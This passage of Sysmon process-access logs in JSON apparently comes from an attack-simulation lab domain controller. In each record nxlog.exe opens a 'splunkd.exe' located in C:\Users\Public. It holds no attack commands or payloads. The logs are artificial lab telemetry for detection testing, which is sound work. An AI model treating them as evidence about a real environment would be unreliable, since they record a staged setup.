(x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:14.544","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:15","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6471,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:15.544\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:15.544","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:16","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6472,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:16.544\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:16.544","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:17","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:17","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6473,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:17.544\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:17.544","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6474,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:18.544\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:18.544","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:19","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6475,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:19.545\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:19.545","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:57:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6476,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:57:20.545\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3576\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:57:20.545","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3576","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:57:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
